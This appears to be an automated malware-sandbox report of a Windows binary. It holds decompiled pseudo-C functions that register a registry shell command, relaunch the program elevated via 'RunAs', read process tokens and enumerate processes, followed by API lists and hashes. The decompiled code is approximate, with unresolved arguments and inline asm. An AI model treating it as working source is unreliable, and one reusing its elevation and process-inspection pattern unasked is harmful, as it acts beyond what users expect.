                                                                                                                				E0040B550(0x201c, __ecx);
                                                                                                                				_t73 = 0;
                                                                                                                				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                                                					L6:
                                                                                                                					return _t73;
                                                                                                                				}
                                                                                                                				_v6176 = 0;
                                                                                                                				memset( &_v6174, 0, 0x7fe);
                                                                                                                				_t78 = _a4;
                                                                                                                				_push(_t78 + 0x20a);
                                                                                                                				_push(_t78);
                                                                                                                				_push(L"%s\\shell\\%s\\command");
                                                                                                                				_push(0x3ff);
                                                                                                                				_push( &_v6176);
                                                                                                                				L0040B1EC();
                                                                                                                				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                                                					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                                                					asm("sbb ebx, ebx");
                                                                                                                					_t73 =  ~_t49 + 1;
                                                                                                                					RegCloseKey(_v12);
                                                                                                                					_v2080 = _v2080 & 0x00000000;
                                                                                                                					memset( &_v2078, 0, 0x7fe);
                                                                                                                					E00404AD9( &_v2080);
                                                                                                                					if(_v2078 == 0x3a) {
                                                                                                                						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                                                						_v32 = _t55;
                                                                                                                						_t56 =  *0x40ccdc; // 0x5c
                                                                                                                						_v28 = _t56;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						_v32 = _v2080;
                                                                                                                						if(GetDriveTypeW( &_v32) == 3) {
                                                                                                                							_v4128 = 0;
                                                                                                                							memset( &_v4126, 0, 0x7fe);
                                                                                                                							_v8224 = 0;
                                                                                                                							memset( &_v8222, 0, 0x7fe);
                                                                                                                							_push(_a4 + 0x20a);
                                                                                                                							_push(_a4);
                                                                                                                							_push(L"%s\\shell\\%s");
                                                                                                                							_push(0x3ff);
                                                                                                                							_push( &_v8224);
                                                                                                                							L0040B1EC();
                                                                                                                							_push( &_v2080);
                                                                                                                							_push(L"\"%s\",0");
                                                                                                                							_push(0x3ff);
                                                                                                                							_push( &_v4128);
                                                                                                                							L0040B1EC();
                                                                                                                							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				RegCloseKey(_v8);
                                                                                                                				goto L6;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404452
                                                                                                                • _snwprintf.MSVCRT ref: 00404473
                                                                                                                  • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                  • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                  • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                • memset.MSVCRT ref: 004044CF
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                • memset.MSVCRT ref: 00404539
                                                                                                                • memset.MSVCRT ref: 0040454E
                                                                                                                • _snwprintf.MSVCRT ref: 00404571
                                                                                                                • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                  • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                • API String ID: 486436031-734527199
                                                                                                                • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                                                				void _v530;
                                                                                                                				char _v532;
                                                                                                                				void _v1042;
                                                                                                                				long _v1044;
                                                                                                                				long _v4116;
                                                                                                                				char _v5164;
                                                                                                                				void* __edi;
                                                                                                                				void* _t27;
                                                                                                                				void* _t38;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				E0040B550(0x142c, __ecx);
                                                                                                                				_v1044 = 0;
                                                                                                                				memset( &_v1042, 0, 0x1fc);
                                                                                                                				_v532 = 0;
                                                                                                                				memset( &_v530, 0, 0x208);
                                                                                                                				E00404AD9( &_v532);
                                                                                                                				_pop(_t44);
                                                                                                                				E00405AA7( &_v5164);
                                                                                                                				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                                                				_t61 = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					wcscpy( &_v1044,  &_v4116);
                                                                                                                					_pop(_t44);
                                                                                                                				}
                                                                                                                				wcscpy(0x40fb90, _a8);
                                                                                                                				wcscpy(0x40fda0, L"general");
                                                                                                                				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                                                				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                                                				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                                                				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                                                				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                                                				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                                                				wcscpy(0x40fda0, L"strings");
                                                                                                                				_t38 = E00406337(_t44, _t61, _a4);
                                                                                                                				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                                                				return _t38;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406484
                                                                                                                • memset.MSVCRT ref: 004064A0
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                • wcscpy.MSVCRT ref: 004064E4
                                                                                                                • wcscpy.MSVCRT ref: 004064F3
                                                                                                                • wcscpy.MSVCRT ref: 00406503
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                • wcscpy.MSVCRT ref: 0040657A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3037099051-2314623505
                                                                                                                • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401C26(long _a4) {
                                                                                                                				struct _SHELLEXECUTEINFOW _v68;
                                                                                                                				void _v582;
                                                                                                                				char _v584;
                                                                                                                				void _v1110;
                                                                                                                				char _v1112;
                                                                                                                				long _t23;
                                                                                                                				int _t36;
                                                                                                                				void* _t43;
                                                                                                                				long _t44;
                                                                                                                
                                                                                                                				_t44 = 0;
                                                                                                                				_t23 = GetCurrentProcessId();
                                                                                                                				_v584 = 0;
                                                                                                                				memset( &_v582, 0, 0x1fe);
                                                                                                                				_v1112 = 0;
                                                                                                                				memset( &_v1110, 0, 0x208);
                                                                                                                				E00404AD9( &_v1112);
                                                                                                                				_push(_t23);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				_push(L"/SpecialRun %I64x %d");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v584);
                                                                                                                				L0040B1EC();
                                                                                                                				memset( &(_v68.fMask), 0, 0x38);
                                                                                                                				_v68.lpFile =  &_v1112;
                                                                                                                				_v68.lpParameters =  &_v584;
                                                                                                                				_v68.cbSize = 0x3c;
                                                                                                                				_v68.lpVerb = L"RunAs";
                                                                                                                				_v68.fMask = 0x40;
                                                                                                                				_v68.nShow = 5;
                                                                                                                				_t36 = ShellExecuteExW( &_v68);
                                                                                                                				_t43 = _v68.hProcess;
                                                                                                                				if(_t36 == 0) {
                                                                                                                					_t44 = GetLastError();
                                                                                                                				} else {
                                                                                                                					WaitForSingleObject(_t43, 0x5dc);
                                                                                                                					_a4 = 0;
                                                                                                                					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
                                                                                                                						_t44 = _a4;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t44;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                • memset.MSVCRT ref: 00401C4F
                                                                                                                • memset.MSVCRT ref: 00401C68
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                • memset.MSVCRT ref: 00401C9B
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                                • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                • API String ID: 903100921-3385179869
                                                                                                                • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00409A94(long _a4, intOrPtr _a8) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				int _v16;
                                                                                                                				void* _v20;
                                                                                                                				void* _v24;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				char _v52;
                                                                                                                				char _v60;
                                                                                                                				void _v315;
                                                                                                                				char _v316;
                                                                                                                				void _v826;
                                                                                                                				char _v828;
                                                                                                                				void _v1338;
                                                                                                                				char _v1340;
                                                                                                                				void* __esi;
                                                                                                                				void* _t61;
                                                                                                                				_Unknown_base(*)()* _t93;
                                                                                                                				void* _t94;
                                                                                                                				int _t106;
                                                                                                                				void* _t108;
                                                                                                                				void* _t110;
                                                                                                                
                                                                                                                				_v828 = 0;
                                                                                                                				memset( &_v826, 0, 0x1fe);
                                                                                                                				_v1340 = 0;
                                                                                                                				memset( &_v1338, 0, 0x1fe);
                                                                                                                				_t110 = _t108 + 0x18;
                                                                                                                				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                                                				_t113 = _t61;
                                                                                                                				_v20 = _t61;
                                                                                                                				if(_t61 == 0) {
                                                                                                                					L11:
                                                                                                                					if(_v828 == 0) {
                                                                                                                						__eflags = 0;
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					_push( &_v828);
                                                                                                                					_push( &_v1340);
                                                                                                                					_push(L"%s\\%s");
                                                                                                                					_push(0xff);
                                                                                                                					_push(_a8);
                                                                                                                					L0040B1EC();
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_v8 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                                                				_t106 = _v24;
                                                                                                                				if(_t106 == 0) {
                                                                                                                					_t32 =  &_v20; // 0x4059ec
                                                                                                                					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                                                					_v316 = 0;
                                                                                                                					memset( &_v315, 0, 0xfe);
                                                                                                                					_t110 = _t110 + 0x20;
                                                                                                                					_v16 = 0xff;
                                                                                                                					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L9:
                                                                                                                						CloseHandle(_v20);
                                                                                                                						if(_v8 != 0) {
                                                                                                                							FreeLibrary(_v8);
                                                                                                                						}
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_push( &_v28);
                                                                                                                					_push( &_a4);
                                                                                                                					_push( &_v1340);
                                                                                                                					_push( &_v12);
                                                                                                                					_push( &_v828);
                                                                                                                					_a4 = 0xff;
                                                                                                                					_push( &_v316);
                                                                                                                					L8:
                                                                                                                					_v12 = 0xff;
                                                                                                                					E0040906D( &_v8, _t117);
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_v316 = 0;
                                                                                                                				memset( &_v315, 0, 0xff);
                                                                                                                				_v12 = _t106;
                                                                                                                				_t110 = _t110 + 0xc;
                                                                                                                				_a4 = 0;
                                                                                                                				if(E00408F72( &_v8) == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                                                				if(_t93 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                                                				_t117 = _t94;
                                                                                                                				if(_t94 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_push( &_v28);
                                                                                                                				_push( &_v12);
                                                                                                                				_push( &_v1340);
                                                                                                                				_push( &_v16);
                                                                                                                				_push( &_v828);
                                                                                                                				_push(_v316);
                                                                                                                				_v16 = 0xff;
                                                                                                                				goto L8;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409AB7
                                                                                                                • memset.MSVCRT ref: 00409ACF
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • memset.MSVCRT ref: 00409B25
                                                                                                                • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                • memset.MSVCRT ref: 00409BC7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                • API String ID: 3504373036-27875219
                                                                                                                • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409172() {
                                                                                                                				void* _t1;
                                                                                                                				int _t2;
                                                                                                                				struct HINSTANCE__* _t5;
                                                                                                                
                                                                                                                				if( *0x4101bc != 0) {
                                                                                                                					return _t1;
                                                                                                                				}
                                                                                                                				_t2 = E00405436(L"psapi.dll");
                                                                                                                				_t5 = _t2;
                                                                                                                				if(_t5 == 0) {
                                                                                                                					L10:
                                                                                                                					return _t2;
                                                                                                                				} else {
                                                                                                                					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                                                					 *0x40f848 = _t2;
                                                                                                                					if(_t2 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                                                						 *0x40f840 = _t2;
                                                                                                                						if(_t2 != 0) {
                                                                                                                							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                                                							 *0x40f838 = _t2;
                                                                                                                							if(_t2 != 0) {
                                                                                                                								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                                                								 *0x40fa6c = _t2;
                                                                                                                								if(_t2 != 0) {
                                                                                                                									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                                                									 *0x40f844 = _t2;
                                                                                                                									if(_t2 != 0) {
                                                                                                                										 *0x4101bc = 1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( *0x4101bc == 0) {
                                                                                                                						_t2 = FreeLibrary(_t5);
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1182944575-70141382
                                                                                                                • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004090EE() {
                                                                                                                				void* _t1;
                                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                                				struct HINSTANCE__* _t4;
                                                                                                                
                                                                                                                				if( *0x4101b8 != 0) {
                                                                                                                					return _t1;
                                                                                                                				}
                                                                                                                				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                				_t4 = _t2;
                                                                                                                				if(_t4 == 0) {
                                                                                                                					L9:
                                                                                                                					return _t2;
                                                                                                                				}
                                                                                                                				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                				 *0x40f83c = _t2;
                                                                                                                				if(_t2 != 0) {
                                                                                                                					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                					 *0x40f834 = _t2;
                                                                                                                					if(_t2 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                						 *0x40f830 = _t2;
                                                                                                                						if(_t2 != 0) {
                                                                                                                							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                							 *0x40f5c4 = _t2;
                                                                                                                							if(_t2 != 0) {
                                                                                                                								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                								 *0x40f828 = _t2;
                                                                                                                								if(_t2 != 0) {
                                                                                                                									 *0x4101b8 = 1;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L9;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				char _v1028;
                                                                                                                				void _v1538;
                                                                                                                				char _v1540;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t50;
                                                                                                                				void* _t61;
                                                                                                                
                                                                                                                				_t50 = __ecx;
                                                                                                                				_push(0x1fe);
                                                                                                                				_push(0);
                                                                                                                				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                					_v1540 = 0;
                                                                                                                					memset( &_v1538, ??, ??);
                                                                                                                					_v1028 = 0;
                                                                                                                					memset( &_v1026, 0, 0x1fe);
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                					L0040B1EC();
                                                                                                                					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                					L0040B1EC();
                                                                                                                					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                					if (_t39 != 0) goto L3;
                                                                                                                					return _t39;
                                                                                                                				}
                                                                                                                				_v516 = 0;
                                                                                                                				memset( &_v514, ??, ??);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fe);
                                                                                                                				L0040B1EC();
                                                                                                                				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                				L0040B1EC();
                                                                                                                				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
